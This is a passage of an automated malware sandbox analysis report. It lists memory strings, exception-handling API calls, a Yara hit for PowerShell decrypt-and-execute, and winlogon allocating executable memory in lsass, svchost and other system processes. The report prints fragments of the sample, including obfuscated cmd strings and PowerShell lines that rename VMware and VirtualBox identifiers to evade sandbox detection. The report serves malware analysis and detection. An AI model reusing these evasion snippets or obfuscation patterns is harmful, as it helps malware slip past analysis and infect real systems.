bTQojtGIjSqIRbUAE%s%lhudzqenKEDUsqnulmpxymetMsDcEUHkPQGzbRBC%i%LazPdNRCdnFPFcfZcaqgNcJPXsfCKNsuLNMxNpqY%o%BaYrpSFMKHwaAuPJrKRKIpSpUleRqHlMKsFMdsze%n%MsRdqsTqXdgcxGqmiJweONwcvKqiPcFZkMXpyPYC% %rNUnBjoebsEuVvqZWOHGbLAUxgSLIbOsLTMaTiBl%-%vlgwyldPvYsJhrAGmZPvqDvaElJcIqfOnwlPEevm%"
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
        Source: svchost.exe, 00000017.00000002.2726924144.0000021C28C2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000003.1777739676.00000276D75E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
        Source: svchost.exe, 00000027.00000002.2733515683.0000027240289000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
        Source: lsass.exe, 0000000E.00000000.1576379216.0000019AB8413000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2728032922.0000019AB8413000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2717409454.000001A53EA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1585342930.000001A53EA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.1620821903.000001AD0982B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2715781969.000001AD0982B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2703475476.0000020EBFA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1622377915.0000020EBFA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2727103372.000001777B041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1627885243.000001777B041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1650770311.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: dwm.exe, 00000010.00000000.1592705358.0000023829B56000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000@[LJ
        Source: cmd.exe, 00000003.00000003.1351181817.000001D54F3AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ossoPzYuhDPcIp%H%hhqEnzgdDXZOyEKCBdBYAKXZlLvkLATXXuFeGCPnGkP%M%upaauKEbLAKOwjqsBeWsdebReYFWZoorpVCKkLazgyh%J%xnFiVqjniKSLqojVvfIcxlszBGGiQdxmFWEDzPKFQag%l%HxjmwaPEtxvJlUgHoKaxemFgtJFwGuclxfKbstjhazd%N%OjnsItivVPCbuScTMvsYYukmgkepUATwFjQWgrWcyZh%P%wUdpipAxMIAeuZamyoTBuWgwlbgMuyqAZnNscUWZtdg%F%OeewXffxOExMAOGegjNcorafglIjEsThrPrshFiHpaC%x%VBAnEvQPQFbSweZpLxVTvLquKwoWBagMnPeDFYeNODc%Y%BqWUoiqxkuggklgChhTnQzoEGZvJNthfRIPeOCaOkDW%%WZYeMUZOVhbw%x%gJUszvWGUpmbbrnoMHJRmboBwbOFgfcnDWxXfdjrwBk%"
        Source: lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
        Source: svchost.exe, 00000027.00000000.1719336918.0000027240213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: cmd.exe, 00000003.00000003.1385910302.000001D54F3A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usfnMAVWMbqwlmNifdnVYidRdCsYtzLgStfVftFZh%w%ZkJDRiTepZuiaompokjiWDnpjDRgScLxnNZXtoltyUeArY%I%SfTFQivRlwXttnrMmmoWUmooWaZQJbzNYlLMnmlCbvCCaZ%O%UXcLIRludGQEJQjFhjXkviCEzZaMVzJLnWfcNXtHBEhfVI%U%DvswntFQEMuxmJQzyEWeqMLhRkPpIQaxJQvFtylpgxssHq%R%LKRcfCiQsRKlEdEpiOLXOwnkfatHYTtsAByfxFKypSyEVi%p%UhLRoEGKBoxHWfiASyxrLdEyRCdnHWYIoXflWgEPMPajIQ%w%IEpOZZhEwRDmZMAtcEqOsZZXELUIFVduQbTyXSXZAKAoIJ%T%hSosNvTTxJEsknezZBNivXScwjHroIyLoUDctmiHBXEkUF%r%IJUbLZAAnkZmWDNBFPkTdpJcfMsgGytIhQBYxmWykOHtch%x%qFTarOZaBsZRVYHuTOQrefbPesSLJpIqZXwNmGhEIhpiYF%w%qXRPUSCLdkEeWYVnqlKJRXCUinHlIWPSQycUUTvQNoUljh%O%KiJvQeypNsvXHGkqdgvLnxWbtxPUWDdrLaDzCngKuBKJzW%m%mPFwlNPxTmlHbtpDskpdmHdLNPaKqMNnBxlaoArpBngqnV%D%mMvQjzuwJFMUIvNfhhzYgEippSTZBZAMxSDnozDnTfNFnt%U%RVCwfZRoOHEgBqGuUKeaxPSzQHElfbQCbVaXxeTAUieVJi%%bhkrSvMNS%f%mGykdAnWcdcFyvFjNRbeFqIWQQEfoLWPIJrEHQMbNZXUuyvfo%"
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
        Source: svchost.exe, 00000020.00000000.1689078082.00000237FDA02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
        Source: lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000001D54FA0DD1C
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA012DC RegQueryInfoKeyW,GetProcessHeap,HeapAlloc,RegEnumValueW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,GetProcessHeap,HeapAlloc,StrCpyW,GetProcessHeap,HeapFree,3_2_000001D54FA012DC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\winlogon.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000001D54FA0DD1C
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA09490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000001D54FA09490
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA097F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000001D54FA097F4
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000281B7BCDD1C
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BC9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000281B7BC9490
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BC97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00000281B7BC97F4
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D199490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F66D199490
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F66D19DD1C
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D1997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000001F66D1997F4
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB93797F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0000019AB93797F4
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB9379490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000019AB9379490
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000019AB937DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDA97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001A53EDA97F4
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDA9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001A53EDA9490
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001A53EDADD1C
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000027D8F4CDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4C97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000027D8F4C97F4
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4C9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000027D8F4C9490
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000001AD09EADD1C
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EA9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000001AD09EA9490
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EA97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_000001AD09EA97F4
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC0139490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000020EC0139490
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000020EC013DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC01397F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000020EC01397F4
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6A97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00000229EA6A97F4
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6A9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000229EA6A9490
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6ADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000229EA6ADD1C
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001777BDCDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDC9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001777BDC9490
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDC97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001777BDC97F4
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6B9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001590E6B9490
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001590E6BDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6B97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001590E6B97F4
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A69490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000021C29A69490
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A697F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0000021C29A697F4
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000021C29A6DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000276D72CDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72C97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00000276D72C97F4
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72C9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000276D72C9490
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846C97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0000021D846C97F4
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846C9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000021D846C9490
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000021D846CDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA99490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0000025BFDA99490
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_0000025BFDA997F4
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0000025BFDA9DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000016914569490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000016914569490
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000001691456DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000169145697F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00000169145697F4

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell decrypt and execute
        Source: Yara matchFile source: amsi64_8748.amsi.csv, type: OTHER
        Allocates memory in foreign processes
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\lsass.exe base: 19AB9340000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A53E9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2382E970000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27D8F490000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AD09E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20EBF9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 229EA670000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1777BD90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1590E680000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C29A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 276D7290000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21D84690000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25BFDA60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16914530000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 227D2790000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 131E07D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13EB1F30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27714AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 237FE190000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C5FFB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B9EE140000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B6D8940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26099880000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 267E87C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 223D5150000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 272401A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24AD0130000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2565A3D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184F43B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A196F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21502F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C8729B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 233591B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21DDF750000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10E069A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 23F7E630000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 230BDE80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ED12670000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 120CB340000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 297251A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C84E940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\sihost.exe base: 22ABD090000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 299C2130000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A4D1190000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 280593C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28CCBE80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253D40E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 156E8510000 protect: page execute and read and writeJump to behavior
